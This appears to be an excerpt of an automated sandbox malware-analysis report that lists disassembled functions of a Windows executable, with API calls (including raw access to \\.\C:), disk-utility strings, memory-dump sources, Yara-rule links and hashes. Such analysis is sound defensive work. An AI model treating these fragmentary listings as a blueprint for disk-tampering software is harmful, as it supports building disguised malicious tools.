                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0041F6D0,?,00094638,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000), ref: 004262B5
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,?,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 004262E1
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00094638,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000,?), ref: 004262F2
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,00000000,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 0042630F
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,00000000,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 00426330
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3322701435-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 406f029fa45b1055b96b03b8e5df20f9be275f8369c24922fb13ea929e72a033
                                                                                                                                                                                                                                                                                    • Instruction ID: cb33d9e4ec5480741093735bde79ecc2fcd6722e1911622dc14afd3accb78fd4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 406f029fa45b1055b96b03b8e5df20f9be275f8369c24922fb13ea929e72a033
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E1191713803156BE220AFA4ECC6F27769CD745B04F61083DFB45AA2C1D5A47C448668
                                                                                                                                                                                                                                                                                    Function 0045FB10 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 371fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,BB40E64E), ref: 0045FBFD
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045FD6C
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00460023
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00460032
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLastUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: \\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 2002255750-259948872
                                                                                                                                                                                                                                                                                    • Opcode ID: 78a3ab837c1cc29033b75d00d7e8fdab04217b08f6faec90c845abaadf20f047
                                                                                                                                                                                                                                                                                    • Instruction ID: f68b579a164141f6a35d8a11ab023a6fd55b536e149a63f8f0d67cb16e8cd9f8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78a3ab837c1cc29033b75d00d7e8fdab04217b08f6faec90c845abaadf20f047
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F139B15183419FC324DF25C881AAFB7E4BF89714F104A2EF99983351E778A948CB97
                                                                                                                                                                                                                                                                                    Function 00405230 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 366COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 004055AD
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,...,00000003,?), ref: 0040561D
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 00405675
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExtentPoint32Text
                                                                                                                                                                                                                                                                                    • String ID: ...$`=
                                                                                                                                                                                                                                                                                    • API String ID: 223599850-889875407
                                                                                                                                                                                                                                                                                    • Opcode ID: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                    • Instruction ID: 472bae36e9bbe25dca023677f1d007ac7a5f0ef4219e7f68ecfc9801725c9705
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31E131755087059FC310DF68C884A5BBBE5FB88304F548A2EF896A33A1D774E885CF96
                                                                                                                                                                                                                                                                                    Function 004042E0 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                    • GetDIBColorTable.GDI32(00000000,?,00000001,?,?,?,004042D6,?,?,?,?,?,?,?,00000000), ref: 0040431B
                                                                                                                                                                                                                                                                                    • TransparentBlt.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,004042D6,?,?,?), ref: 00404360
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 004043F4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401270: InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401270: CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                    • AlphaBlend.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,004042D6,?), ref: 004043AC
                                                                                                                                                                                                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,00000000,?,?,?,00000000,00CC0020), ref: 004043DE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect$AlphaBlendColorCompatibleCreateExchangeInterlockedStretchTableTransparent
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1847558199-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                    • Instruction ID: 431ece418818d9ed3e284c2d9fdf2eea9b1bc5e51d71579e1970bbd9de33fc15
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6641C9B1208740AFD214CB6AC884E2BB7E9EBCD718F108B1DF59DA3691D674ED01CB65
                                                                                                                                                                                                                                                                                    Function 00411050 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0041109B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110AE
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 004110CF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110E2
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0041110B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0041111E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendVisibleWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3984873885-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                    • Instruction ID: f50cee19580f5a7b4a735ae81b0960ad1265907f2bd47cc1e7f642e33356c098
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC21A070A40316ABD730DF759C41BAB7698BB88740F050A3EB649DB391EA75EC80879D
                                                                                                                                                                                                                                                                                    Function 0040E9B0 Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0040E9D6
                                                                                                                                                                                                                                                                                    • LPtoDP.GDI32(?,?,00000002), ref: 0040E9EE
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EA08
                                                                                                                                                                                                                                                                                    • GetMapMode.GDI32(?,?,0047D9F0,00000000), ref: 0040EA2E
                                                                                                                                                                                                                                                                                    • DPtoLP.GDI32(?,?,00000002), ref: 0040EA45
                                                                                                                                                                                                                                                                                    • GetBkColor.GDI32(?), ref: 0040EA78
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreate$BitmapColorMode
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 451781270-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                    • Instruction ID: 3bfa88b0da709e4d3224c5894ad5c167e82e64c80dae2195e34fb9d2b55d46f1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3931E975200600AFC724DF65D984D5BB7E9FF88700B448A2DA94A8B646DB34E944CFA5
                                                                                                                                                                                                                                                                                    Function 004650D0 Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                    • Instruction ID: c3f58fe0059228c05da5b00147ff564d140f859395390daa2f6f08e4d30ee4c4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E21FF74900F00AAE3302F21EC89717BBF4FB85741F918D2EE5C5406A0EB3594688B4A
                                                                                                                                                                                                                                                                                    Function 00455E40 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 298timeCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0045619C
                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004561B2
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004561D8
                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00456226
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$FileSystem$CountCriticalEnterSectionTick
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 220952284-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 9b821a3dd54ab9ed9db7fcd5dc35dbb8b01fc2355ba314658f3cb738f20e72fe
                                                                                                                                                                                                                                                                                    • Instruction ID: 934190aa3f0b3ae95b724ee9cdb0041c178ee72d2cde610639a7ed787e377e39
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b821a3dd54ab9ed9db7fcd5dc35dbb8b01fc2355ba314658f3cb738f20e72fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDD117B1A04B06EFC314DF65C484A9AFBE4FF48701F904A1EE85993611DB34B958CF9A
                                                                                                                                                                                                                                                                                    Function 00467820 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 004679CE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004679E4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DeleteObject
                                                                                                                                                                                                                                                                                    • String ID: 8K$`=
                                                                                                                                                                                                                                                                                    • API String ID: 4188969710-450670534
                                                                                                                                                                                                                                                                                    • Opcode ID: bb304f05f30cbdd69a183ac06b326108be92b73323326cf8809e001b9e6bd276
                                                                                                                                                                                                                                                                                    • Instruction ID: 57d6ba00d9628d7bc6127d5ab1f70525051783d1f21ea283ef51d44a992bc025
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb304f05f30cbdd69a183ac06b326108be92b73323326cf8809e001b9e6bd276
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92612C70A08316DFD714EF64C884A1AB7A5BF84318F1088AEE955A7351E734EC45CFAB
                                                                                                                                                                                                                                                                                    Function 004256D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 156windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042571B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00425737
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00425888
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
